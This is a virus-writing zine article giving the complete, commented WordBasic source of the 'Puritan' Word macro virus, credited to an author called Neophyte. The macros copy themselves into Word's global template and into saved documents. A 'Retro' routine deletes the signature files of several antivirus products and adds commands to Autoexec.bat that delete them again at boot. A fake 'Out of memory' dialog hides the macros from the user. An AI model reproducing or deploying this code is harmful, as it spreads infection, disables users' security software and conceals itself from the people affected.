Copy Link
Add to Bookmark
Report
SLAM.011: WordMacro/Puritan (1) virus
[ WordMacro. Puritan (1) ]
-------------------------------------------------------
˛ VIRUSNAME: Puritan (1)
˛ SIZE: 6607 Bytes (6 Macros)
˛ ORIGIN: The Netherlands
˛ AUTHOR: Neophyte
->Polymorf No
->Stealth Yes
->Encrypted Yes, this file not but see virii.zip for encrypted version.
->Retro Yes
-----------------------------------------------------------
Macro AutoOpen
-----------------------------------------------------------
Sub MAIN
On Error Goto Z 'Error Handler.
iM = CountMacros(0, 0) 'Count macros in Normal.Dot
For i = 1 To M 'Check if Normal.Dot (Global...
If M$(i, 0, 0) = "Puritan" Then Y = - 1
End If 'Template) is already infected.
Next i
If Not Y Then 'If not infected copy all macros...
F$ = FileName$() 'from infected file to Normal.Dot...
S$ = F$ + ":Puritan" '(Global Template).
MacroCopy S$, "Global:Puritan"
S$ = F$ + ":Rtr"
MacroCopy S$, "Global:Retro"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FileSaveAs"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FSAB"
S$ = F$ + ":AOB"
MacroCopy S$, "Global:AOB"
S$ = F$ + ":ToolsMacro"
MacroCopy S$, "Global:ToolsMacro"
End If
ToolsMacro .Name = "Retro", .Run, .Show = 0, .Discription = "", .NewName = ""
'After infection run the Retro macro...
'to attack AV software.
Z:
End Sub
-----------------------------------------------------------
Macro AOB
-----------------------------------------------------------
Sub MAIN
On Error Goto Z 'Error Handler.
iM = CountMacros(0, 0) 'Count macros in Normal.Dot
For i = 1 To M 'Check if Normal.Dot (Global...
If M$(i, 0, 0) = "Puritan" Then Y = - 1
End If 'Template) is already infected.
Next i
If Not Y Then 'If not infected copy all macros...
F$ = FileName$() 'from infected file to Normal.Dot...
S$ = F$ + ":Puritan" '(Global Template).
MacroCopy S$, "Global:Puritan"
S$ = F$ + ":Rtr"
MacroCopy S$, "Global:Retro"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FileSaveAs"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FSAB"
S$ = F$ + ":AOB"
MacroCopy S$, "Global:AOB"
S$ = F$ + ":ToolsMacro"
MacroCopy S$, "Global:ToolsMacro"
End If
ToolsMacro .Name = "Retro", .Run, .Show = 0, .Discription = "", .NewName = ""
'After infection run the Retro macro...
'to attack AV software.
Z:
End Sub
-----------------------------------------------------------
Macro FSAB
-----------------------------------------------------------
Sub MAIN
Dim dlg As FileSaveAs 'This is just a simple...
On Error Goto Z 'FileSaveAs Backup macro,
F$ = FileName$() 'it's sort of the same as...
GetCurValues dlg 'the concept virus.
Dialog dlg
If dlg.Format = 0 Then dlg.Format = 1
T$ = F$ + ":AutoOpen"
MacroCopy "Global:AOB", T$
T$ = F$ + ":Retro"
MacroCopy "Global:Rtr", T$
T$ = F$ + ":AOB"
MacroCopy "Global:AOB", T$
T$ = F$ + ":FSAB"
MacroCopy "Global:FSAB", T$
T$ = F$ + ":Puritan"
MacroCopy "Global:Puritan", T$
T$ = F$ + ":ToolsMacro"
MacroCopy "Global:ToolsMacro", T$
FileSaveAs dlg
Goto Q
Z:
If Err <> 102 Then
FileSaveAs dlg
End If
Q:
End Sub
-----------------------------------------------------------
Macro Puritan 'Just some dull text
-----------------------------------------------------------
REM The Style of macro virii was invented by
REM those with an Open mind...
REM If you have an Open mind To other influences
REM you will grow out as one of the best...
'Poet of the highest quality ;-) from
'--- Neophyte ----
-----------------------------------------------------------
Macro Rtr 'For attacking AV products.
-----------------------------------------------------------
Sub MAIN
On Error Goto a 'Error Handler
VF$ = "C:\Program Files\Norton AntiVirus\Virscan.Dat"
'VF$ are the scan strings...
'from NAV.
If Files$(VF$) = "" Then Goto a 'If VF$ not exists goto a.
SetAttr VF$, 0 'Else set attributes to none.
Kill VF$ 'Then delete VF$ (The cool stuff).
a:
On Error Goto c 'Error Handler.
AB$ = "C:\Autoexec.bat" 'AB$ is AutoExec.bat.
If Files$(AB$) = "" Then Goto c 'If AB$ doesn't exists goto c.
SetAttr AB$, 0 'else set attributes to none.
Open AB$ For Append As #1 'And open AB$ for appending.
Print #1, "@echo off" 'Put this at the end of the...
Print #1, "IF exist " + VF$ + " then del " + VF$
'AutoExec.bat.
Close #1 'Close the AutoExec.bat.
c: 'All this down here should look...
On Error Goto d 'familiar, because it's the...
VF$ = "C:\Program Files\F-Prot95\Fpwm32.dll"
If Files$(VF$) = "" Then Goto d 'same as above, only with other...
SetAttr VF$, 0 'file names.
Kill VF$
d:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto f
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
f:
On Error Goto g
VF$ = "C:\Program Files\McAfee\Scan.dat"
If Files$(VF$) = "" Then Goto g
SetAttr VF$, 0
Kill VF$
g:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto h
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
h:
On Error Goto i
VF$ = "C:\Tbavw95\Tbscan.sig"
If Files$(VF$) = "" Then Goto i
SetAttr VF$, 0
Kill VF$
i:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto j
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
J:
Z:
End Sub
-----------------------------------------------------------
Macro ToolsMacro 'copied from NJ's MooNRaiDer virus, only a bit changed.
-----------------------------------------------------------
Sub MAIN
B$ = "Out of memory." 'B$ is the text Out Of Memory.
C$ = "WordBasic Err = 7" 'C$ is the text WordBasic Err = 7.
Dim ComboBox1$(0)
ComboBox1$(0) = "" 'ComboBox1$ is empty.
Dim ListBox1$(0)
ListBox1$(0) = "" 'ListBox1$ is empty.
Dim DropListBox2$(0)
DropListBox2$(0) = "Normal.dot(Global Template)"
'DropListBox2$ contains the text...
'Normal.dot(Global Template).
A:
Begin Dialog UserDialog 442, 320, "Macro" 'Create a dialog called macro.
CancelButton 290, 38, 141, 21 'Create a cancelbutton.
PushButton 290, 14, 141, 21, "Rec&ord...", .D2'Create a pushbutton with...
'the label "Record..." the...
'& stands for a _ a short-cut.
PushButton 290, 72, 141, 21, "&Run", .D3 'Same as above.
PushButton 290, 97, 141, 21, "&Create", .D4 'Same as above.
PushButton 290, 125, 141, 21, "&Delete", .D5 'Same as above.
PushButton 290, 161, 141, 21, "Or&ganizer...", .D6 'Same as above.
ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1 'Creates an empty...
'ComboBox.
Text 6, 223, 93, 13, "Macros &Available In:", .T1 'Some text on the...
Text 7, 259, 109, 13, "Description:", .T2 'dialog.
Text 7, 7, 93, 13, "&Macro Name:", .T3
ListBox 7, 276, 425, 38, ListBox1$(), .LB1 'Creates an empty...
'ListBox.
DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2 'Creates a DropListBox...
'containing the text: Normal.Dot(Global Template).
End Dialog 'Ends the dialog.
Redim dlg As UserDialog 'Opens the dialog for setting up...
x = Dialog(dlg) 'the things to do when a button is pushed.
Select Case x
Case 0 'If the Cancel button is pushed...
Cancel 'just cancel the dialog.
Case 1
MsgBox B$, C$, 48 'If another button is pushed...
Goto A 'Display a message box containing...
Case 2 'the text:"Out Of Memory." and...
MsgBox B$, C$, 48 'has as title:"WordBasic Err = 7".
Goto A
Case 3
MsgBox B$, C$, 48
Goto A
Case 4
MsgBox B$, C$, 48
Goto A
Case 5
MsgBox B$, C$, 48
Goto A
End Select
End Sub
------------------------The End-------------------------
--- Neophyte ---
